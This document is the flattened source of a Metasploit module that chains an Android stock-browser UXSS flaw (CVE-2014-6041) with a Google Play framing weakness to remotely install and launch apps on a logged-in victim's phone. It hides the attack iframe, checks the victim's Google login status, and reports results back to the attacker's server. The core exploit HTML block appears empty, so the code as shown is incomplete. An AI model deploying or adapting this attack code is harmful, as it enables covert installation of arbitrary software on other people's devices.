## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Android Browser RCE Through Google Play Store XFO', 'Description' => %q{ This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, as any application available on the Google Play store can be installed and launched on the user's device. This module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`. }, 'Author' => [ 'Rafay Baloch', # Original UXSS vulnerability 'joev' # Play Store vector and Metasploit module ], 'License' => MSF_LICENSE, 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]], 'PassiveActions' => [ 'WebServer' ], 'References' => [ [ 'URL', 'https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'], [ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ], [ 'OSVDB', '110664' ], [ 'CVE', '2014-6041' ] ], 'DefaultAction' => 'WebServer' )) register_options([ OptString.new('PACKAGE_NAME', [ true, 'The package name of the app on the Google Play store you want to install', 'com.swlkr.rickrolld' ]), OptString.new('ACTIVITY_NAME', [ true, 'The name of the activity in the apk to launch', 'com.swlkr.rickrolld/.RickRoll' ]), OptBool.new('DETECT_LOGIN', [ true, "Prevents the exploit from running if the user is not logged into Google", true ]), OptBool.new('HIDE_IFRAME', [ true, "Hide the exploit iframe from the user", true ]) ]) end def on_request_uri(cli, request) print_status("Request '#{request.method} #{request.uri}'") if request.method.downcase == 'post' print_error request.body[0..400] send_response_html(cli, '') else print_status("Sending initial HTML ...") send_response_html(cli, exploit_html) end end def exploit_html <<-EOS EOS end def detect_login_js if datastore['DETECT_LOGIN'] %Q| var img = document.createElement('img'); img.onload = exploit; img.onerror = function() { var url = '#{backend_url}'; var x = new XMLHttpRequest(); x.open('POST', url); x.send('Exploit failed: user is not logged into google.com') }; img.setAttribute('style', HIDDEN_STYLE); var rand = '&d=#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}'; img.setAttribute('src', 'https://accounts.google.com/CheckCookie?continue=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png'+rand); document.body.appendChild(img); | else 'exploit();' end end def hidden_css if datastore['HIDE_IFRAME'] 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px;visibility:hidden;' else '' end end def backend_url proto = (datastore["SSL"] ? "https" : "http") myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}" "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch" end def run exploit end end